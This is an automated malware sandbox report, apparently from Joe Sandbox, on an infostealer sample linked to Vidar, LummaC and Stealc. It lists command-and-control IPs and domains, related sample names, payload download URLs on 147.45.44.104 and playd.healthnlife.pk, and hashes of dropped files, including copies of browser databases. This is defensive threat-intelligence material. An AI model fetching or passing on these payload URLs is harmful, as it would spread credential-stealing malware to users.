104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
147.45.44.104 | playd.healthnlife.pk | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false
172.67.166.76 | advocachark.store | United States | 13335 | CLOUDFLARENETUS | true
45.132.206.251 | cowod.hopto.org | Russian Federation | 59731 | LIFELINK-ASRU | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1524997
Start date and time: 2024-10-03 15:13:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@22/32@14/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 93
• Number of non-executed functions: 259
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 40.126.31.73, 40.126.31.67, 20.190.159.2, 20.190.159.68, 20.190.159.75, 20.190.159.64, 20.190.159.71, 20.190.159.23, 199.232.210.172, 20.189.173.22, 4.245.163.56, 40.69.42.241, 192.229.221.95, 172.202.163.200, 20.12.23.50, 20.189.173.20
• Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, blobcollector.events.data.trafficmanager.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: file.exe
Time | Type | Description
09:14:13 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
09:14:41 | API Interceptor | 3x Sleep call for process: MSBuild.exe modified
                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            49.12.197.9file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                          66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                147.45.44.104file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                                                                • 147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
                                                                                                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                • playd.healthnlife.pk/ldms/a43486128347.exe
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • playd.healthnlife.pk/ldms/a43486128347.exe
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                • playd.healthnlife.pk/ldms/a43486128347.exe
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • playd.healthnlife.pk/ldms/a43486128347.exe
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 147.45.44.104/ldms/66fe13d251bbf_lsod.exe
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                • 147.45.44.104/ldms/66fe13d251bbf_lsod.exe
                                                                                                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 147.45.44.104/ldms/bc2d30140aff.exe
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 147.45.44.104/ldms/a43486128347.exe
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 147.45.44.104/ldms/a43486128347.exe
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                • 49.12.197.9
                                                                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                hVLguQ1OyJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                RD4ttmm3bO.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                v4yke52Xwu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                pkUVF88MvI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                QT2Q1292300924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                pl4VFaWQr8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                DHL Receipt_AWB 9892671327.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                37f463bf4616ecd445d4a1937da06e19Layer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                Layer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                24100311.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                4bblnRvDdS.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):540536
                                                                                                                                                                                                                    Entropy (8bit):7.7458511305233015
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12288:TP12qROL6BdHCinYPrcYVfplaR3eumU9bxsG6oDPZ:xXXPiinMIKlaROymxo7Z
                                                                                                                                                                                                                    MD5:49504D08DC10AECA7D36605D6A20BDE0
                                                                                                                                                                                                                    SHA1:BB6CBFC6EF07C8EE1F287F3BE5690D0FFA5AC9EA
                                                                                                                                                                                                                    SHA-256:A6B03FCC5F34E1A4546A92C1B6CCC6ED2DDC92965437D0BB64D4F0E515E22C0E
                                                                                                                                                                                                                    SHA-512:33B6B2AD17C160BF5543D95CB0D2C000FB0B89FDE8BC55DA8424FDEFFA3A4CCC3DE7185CE2E520C421624F714CCFCF83DB09469359F4D41F74B7C2E840C9CA2D
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1765), with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):9976
                                                                                                                                                                                                                    Entropy (8bit):5.499944288613473
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:NzKneRdpYbBp6znmUzaX/6aRMKWPzDNBw8DK9mSl:Nz5eUmUtgmrwbw0
                                                                                                                                                                                                                    MD5:42594FD09C4DF3B174CF5D59B1CAB13A
                                                                                                                                                                                                                    SHA1:1B78FEB748C36A592C468A76BB60E98187D7BE4A
                                                                                                                                                                                                                    SHA-256:F8B55E3B04E0A59BB745C43763D8FBC1CFFDBC247B5525A489B4B74A57319393
                                                                                                                                                                                                                    SHA-512:E2430AB14ADF2EF1CC2CB1F96DEADAFB3598B803A5E7724FDDB68ACF015D7E052291626A3D100FED902731DBFD10A9AE3387581AD2867F64D0B27E8D51B9069F
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "38829aa4-f57e-4fd8-bfd3-d094d57ae30f");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696493966);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696493970);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                                    Entropy (8bit):1.1209886597424439
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                                                                                                                                                    MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                                                                                                                                                    SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                                                                                                                                                    SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                                                                                                                                                    SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                    Entropy (8bit):0.8475592208333753
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
                                                                                                                                                                                                                    MD5:BE99679A2B018331EACD3A1B680E3757
                                                                                                                                                                                                                    SHA1:6E6732E173C91B0C3287AB4B161FE3676D33449A
                                                                                                                                                                                                                    SHA-256:C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
                                                                                                                                                                                                                    SHA-512:9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):5242880
                                                                                                                                                                                                                    Entropy (8bit):0.03708713717387235
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
                                                                                                                                                                                                                    MD5:85D6E1D7F82C11DAC40C95C06B7B5DC5
                                                                                                                                                                                                                    SHA1:96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
                                                                                                                                                                                                                    SHA-256:D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
                                                                                                                                                                                                                    SHA-512:5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):155648
                                                                                                                                                                                                                    Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                    MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                    SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                    SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                    SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):159744
                                                                                                                                                                                                                    Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                    MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                    SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                    SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                    SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):51200
                                                                                                                                                                                                                    Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):98304
                                                                                                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):106496
                                                                                                                                                                                                                    Entropy (8bit):1.1373607036346451
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                                                                                                                                                                    MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                                                                                                                                                                    SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                                                                                                                                                                    SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                                                                                                                                                                    SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                    Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                                    Entropy (8bit):0.7044361919037112
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:d+bqF0y4ssdhqVoI7RB6tQXIDcQvc6QcEVcw3cE/3+HbHg/8BRTf3Oy1FhZAX/dU:rT4szD0BU/Qju1zuiFFZ24IO8b
                                                                                                                                                                                                                    MD5:1EC39636F364607B3F475FC918B8CE39
                                                                                                                                                                                                                    SHA1:2BB80B48EA0BC9FC0F0B932A33A6CF31CD7FA492
                                                                                                                                                                                                                    SHA-256:47A45A304198444596AEE04A25F5F75F4BB4F183A30F806E6E0B88010CEA1C11
